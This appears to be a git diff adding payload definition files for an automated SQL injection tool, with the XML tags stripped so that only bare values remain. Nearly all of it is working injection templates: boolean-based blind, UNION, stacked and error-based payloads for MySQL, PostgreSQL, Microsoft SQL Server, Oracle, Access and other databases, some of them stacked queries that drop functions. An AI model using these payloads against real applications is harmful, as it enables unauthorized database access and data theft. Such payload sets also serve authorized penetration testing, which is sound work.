- ,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))
-
-
-
-
-
- HSQLDB
- > 2.0
-
-
-
-
-
-
-
-
- MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)
- 3
- 1
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [CHAR]
- [COLSTART]-[COLSTOP]
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)
- 3
- 1
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- NULL
- [COLSTART]-[COLSTOP]
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)
- 3
- 3
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [RANDNUM]
- [COLSTART]-[COLSTOP]
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([CHAR]) - 1 to 10 columns
- 3
- 1
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [CHAR]
- 1-10
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query (NULL) - 1 to 10 columns
- 3
- 1
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- NULL
- 1-10
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([RANDNUM]) - 1 to 10 columns
- 3
- 3
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [RANDNUM]
- 1-10
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([CHAR]) - 11 to 20 columns
- 3
- 2
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [CHAR]
- 11-20
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query (NULL) - 11 to 20 columns
- 3
- 2
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- NULL
- 11-20
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([RANDNUM]) - 11 to 20 columns
- 3
- 3
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [RANDNUM]
- 11-20
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([CHAR]) - 21 to 30 columns
- 3
- 3
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [CHAR]
- 21-30
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query (NULL) - 21 to 30 columns
- 3
- 3
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- NULL
- 21-30
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([RANDNUM]) - 21 to 30 columns
- 3
- 4
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [RANDNUM]
- 21-30
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([CHAR]) - 31 to 40 columns
- 3
- 4
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [CHAR]
- 31-40
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query (NULL) - 31 to 40 columns
- 3
- 4
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- NULL
- 31-40
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([RANDNUM]) - 31 to 40 columns
- 3
- 5
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [RANDNUM]
- 31-40
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([CHAR]) - 41 to 50 columns
- 3
- 5
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [CHAR]
- 41-50
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query (NULL) - 41 to 50 columns
- 3
- 5
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- NULL
- 41-50
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([RANDNUM]) - 41 to 50 columns
- 3
- 5
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [RANDNUM]
- 41-50
-
-
-
-
-
- MySQL
-
-
-
-
- Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)
- 3
- 1
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- --
- [CHAR]
- [COLSTART]-[COLSTOP]
-
-
-
-
-
-
-
- Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)
- 3
- 1
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- --
- NULL
- [COLSTART]-[COLSTOP]
-
-
-
-
-
-
-
- Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)
- 3
- 3
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- --
- [RANDNUM]
- [COLSTART]-[COLSTOP]
-
-
-
-
-
-
-
- Generic UNION query ([CHAR]) - 1 to 10 columns
- 3
- 1
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- --
- [CHAR]
- 1-10
-
-
-
-
-
-
-
- Generic UNION query (NULL) - 1 to 10 columns
- 3
- 1
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- --
- NULL
- 1-10
-
-
-
-
-
-
-
- Generic UNION query ([RANDNUM]) - 1 to 10 columns
- 3
- 3
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- --
- [RANDNUM]
- 1-10
-
-
-
-
-
-
-
- Generic UNION query ([CHAR]) - 11 to 20 columns
- 3
- 2
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- --
- [CHAR]
- 11-20
-
-
-
-
-
-
-
- Generic UNION query (NULL) - 11 to 20 columns
- 3
- 2
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- --
- NULL
- 11-20
-
-
-
-
-
-
-
- Generic UNION query ([RANDNUM]) - 11 to 20 columns
- 3
- 3
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- --
- [RANDNUM]
- 11-20
-
-
-
-
-
-
-
- Generic UNION query ([CHAR]) - 21 to 30 columns
- 3
- 3
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- --
- [CHAR]
- 21-30
-
-
-
-
-
-
-
- Generic UNION query (NULL) - 21 to 30 columns
- 3
- 3
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- --
- NULL
- 21-30
-
-
-
-
-
-
-
- Generic UNION query ([RANDNUM]) - 21 to 30 columns
- 3
- 4
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- --
- [RANDNUM]
- 21-30
-
-
-
-
-
-
-
- Generic UNION query ([CHAR]) - 31 to 40 columns
- 3
- 4
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- --
- [CHAR]
- 31-40
-
-
-
-
-
-
-
- Generic UNION query (NULL) - 31 to 40 columns
- 3
- 4
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- --
- NULL
- 31-40
-
-
-
-
-
-
-
- Generic UNION query ([RANDNUM]) - 31 to 40 columns
- 3
- 5
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- --
- [RANDNUM]
- 31-40
-
-
-
-
-
-
-
- Generic UNION query ([CHAR]) - 41 to 50 columns
- 3
- 5
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- --
- [CHAR]
- 41-50
-
-
-
-
-
-
- Generic UNION query (NULL) - 41 to 50 columns
- 3
- 5
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- --
- NULL
- 41-50
-
-
-
-
-
-
-
- Generic UNION query ([RANDNUM]) - 41 to 50 columns
- 3
- 5
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- --
- [RANDNUM]
- 41-50
-
-
-
-
-
-
-
diff --git a/xml/payloads/01_boolean_blind.xml b/xml/payloads/01_boolean_blind.xml
new file mode 100644
index 000000000..34cf5f2bc
--- /dev/null
+++ b/xml/payloads/01_boolean_blind.xml
@@ -0,0 +1,671 @@
+
+
+
+
+
+
+
+ AND boolean-based blind - WHERE or HAVING clause
+ 1
+ 1
+ 1
+ 1
+ 1
+ AND [INFERENCE]
+
+ AND [RANDNUM]=[RANDNUM]
+
+
+ AND [RANDNUM]=[RANDNUM1]
+
+
+
+
+ AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
+ 1
+ 4
+ 1
+ 1
+ 1
+ AND [INFERENCE]
+
+ AND [RANDNUM]=[RANDNUM]
+ #
+
+
+ AND [RANDNUM]=[RANDNUM1]
+
+
+ MySQL
+
+
+
+
+ AND boolean-based blind - WHERE or HAVING clause (Generic comment)
+ 1
+ 4
+ 1
+ 1
+ 1
+ AND [INFERENCE]
+
+ AND [RANDNUM]=[RANDNUM]
+ --
+
+
+ AND [RANDNUM]=[RANDNUM1]
+
+
+
+
+ OR boolean-based blind - WHERE or HAVING clause
+ 1
+ 2
+ 3
+ 1
+ 2
+ OR ([INFERENCE])
+
+ OR ([RANDNUM]=[RANDNUM])
+
+
+ OR ([RANDNUM]=[RANDNUM1])
+
+
+
+
+ OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+ 1
+ 3
+ 3
+ 1
+ 2
+ OR ([INFERENCE])
+
+ OR ([RANDNUM]=[RANDNUM])
+ #
+
+
+ OR ([RANDNUM]=[RANDNUM1])
+
+
+ MySQL
+
+
+
+
+ OR boolean-based blind - WHERE or HAVING clause (Generic comment)
+ 1
+ 3
+ 3
+ 1
+ 2
+ OR ([INFERENCE])
+
+ OR ([RANDNUM]=[RANDNUM])
+ --
+
+
+ OR ([RANDNUM]=[RANDNUM1])
+
+
+
+
+ MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
+ 1
+ 3
+ 1
+ 1,2,3
+ 1
+ RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
+
+ RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))
+
+
+ RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))
+
+
+ MySQL
+
+
+
+
+
+
+ Generic boolean-based blind - Parameter replace (original value)
+ 1
+ 2
+ 1
+ 1,2,3
+ 3
+ (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
+
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
+
+
+
+
+ MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)
+ 1
+ 3
+ 1
+ 1,2,3
+ 3
+ MAKE_SET([INFERENCE],[ORIGVALUE])
+
+ MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])
+
+
+ MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])
+
+
+ MySQL
+
+
+
+
+ MySQL boolean-based blind - Parameter replace (ELT - original value)
+ 1
+ 4
+ 1
+ 1,2,3
+ 3
+ ELT([INFERENCE],[ORIGVALUE])
+
+ ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])
+
+
+ ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])
+
+
+ MySQL
+
+
+
+
+ MySQL boolean-based blind - Parameter replace (bool*int - original value)
+ 1
+ 4
+ 1
+ 1,2,3
+ 3
+ ([INFERENCE])*[ORIGVALUE]
+
+ ([RANDNUM]=[RANDNUM])*[ORIGVALUE]
+
+
+ ([RANDNUM]=[RANDNUM1])*[ORIGVALUE]
+
+
+ MySQL
+
+
+
+
+ MySQL >= 5.0 boolean-based blind - Parameter replace (original value)
+ 1
+ 3
+ 1
+ 1,2,3
+ 3
+ (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
+
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
+
+
+ MySQL
+ >= 5.0
+
+
+
+
+ MySQL < 5.0 boolean-based blind - Parameter replace (original value)
+ 1
+ 4
+ 1
+ 1,2,3
+ 3
+ (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
+
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
+
+
+ MySQL
+
+
+
+
+ PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)
+ 1
+ 3
+ 2
+ 1,2,3
+ 3
+ (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)
+
+ (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)
+
+
+ (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)
+
+
+ PostgreSQL
+
+
+
+
+ Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)
+ 1
+ 3
+ 1
+ 1,3
+ 3
+ (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Oracle boolean-based blind - Parameter replace (original value)
+ 1
+ 3
+ 1
+ 1,3
+ 3
+ (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
+
+
+ (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
+
+
+ Oracle
+
+
+
+
+ Microsoft Access boolean-based blind - Parameter replace (original value)
+ 1
+ 3
+ 1
+ 1,3
+ 3
+ IIF([INFERENCE],[ORIGVALUE],1/0)
+
+ IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)
+
+
+ IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)
+
+
+ Microsoft Access
+
+
+
+
+ SAP MaxDB boolean-based blind - Parameter replace (original value)
+ 1
+ 3
+ 1
+ 1,3
+ 3
+ (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)
+
+ (CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)
+
+
+ (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)
+
+
+ SAP MaxDB
+
+
+
+
+
+
+ Generic boolean-based blind - GROUP BY and ORDER BY clauses
+ 1
+ 3
+ 1
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))
+
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))
+
+
+
+
+ Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)
+ 1
+ 4
+ 1
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
+
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
+
+
+
+
+ MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses
+ 1
+ 3
+ 1
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
+
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
+
+
+ MySQL
+ >= 5.0
+
+
+
+
+ MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses
+ 1
+ 4
+ 1
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
+
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
+
+
+ MySQL
+
+
+
+
+ Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
+ 1
+ 3
+ 1
+ 3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Oracle boolean-based blind - GROUP BY and ORDER BY clauses
+ 1
+ 3
+ 1
+ 2,3
+ 1
+ ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
+
+
+ ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
+
+
+ Oracle
+
+
+
+
+ Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses
+ 1
+ 3
+ 1
+ 2,3
+ 1
+ ,IIF([INFERENCE],[ORIGVALUE],1/0)
+
+ ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)
+
+
+ ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)
+
+
+ Microsoft Access
+
+
+
+
+
+
+
+ PostgreSQL stacked conditional-error blind queries
+ 1
+ 3
+ 0
+ 0
+ 2
+ ; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
+
+ ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
+ --
+
+
+ ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
+
+
+ PostgreSQL
+
+
+
+
+ Microsoft SQL Server/Sybase stacked conditional-error blind queries
+ 1
+ 3
+ 0
+ 0
+ 1
+ ; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
+
+ ; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
+ --
+
+
+ ; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
diff --git a/xml/payloads/02_error_based.xml b/xml/payloads/02_error_based.xml
new file mode 100644
index 000000000..bf05f189f
--- /dev/null
+++ b/xml/payloads/02_error_based.xml
@@ -0,0 +1,854 @@
+
+
+
+
+
+ MySQL >= 5.0 AND error-based - WHERE or HAVING clause
+ 2
+ 1
+ 0
+ 1
+ 1
+ AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+
+ AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.0
+
+
+
+
+ MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
+ 2
+ 2
+ 0
+ 1
+ 1
+ AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
+
+ AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.1
+
+
+
+
+ MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)
+ 2
+ 3
+ 0
+ 1
+ 1
+ AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])
+
+ AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.1
+
+
+
+
+ MySQL >= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)
+ 2
+ 4
+ 0
+ 1
+ 1
+ AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
+
+ AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.5
+
+
+
+
+ MySQL >= 4.1 AND error-based - WHERE or HAVING clause
+ 2
+ 2
+ 0
+ 1
+ 1
+ AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)
+
+ AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 4.1
+
+
+
+
+ PostgreSQL AND error-based - WHERE or HAVING clause
+ 2
+ 1
+ 0
+ 1
+ 1
+ AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)
+
+ AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ PostgreSQL
+
+
+
+
+ Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
+ 2
+ 1
+ 0
+ 1
+ 1
+ AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
+
+ AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
+ 2
+ 2
+ 0
+ 1
+ 1
+ AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
+
+ AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Microsoft SQL Server
+ Sybase
+ Windows
+
+
+
+
+ Oracle AND error-based - WHERE or HAVING clause (XMLType)
+ 2
+ 1
+ 0
+ 1
+ 1
+ AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+
+ AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Oracle
+
+
+
+
+ Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
+ 2
+ 2
+ 0
+ 1
+ 1
+ AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
+
+ AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Oracle
+ >= 8.1.6
+
+
+
+
+ Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
+ 2
+ 3
+ 0
+ 1
+ 1
+ AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
+
+ AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))
+
+
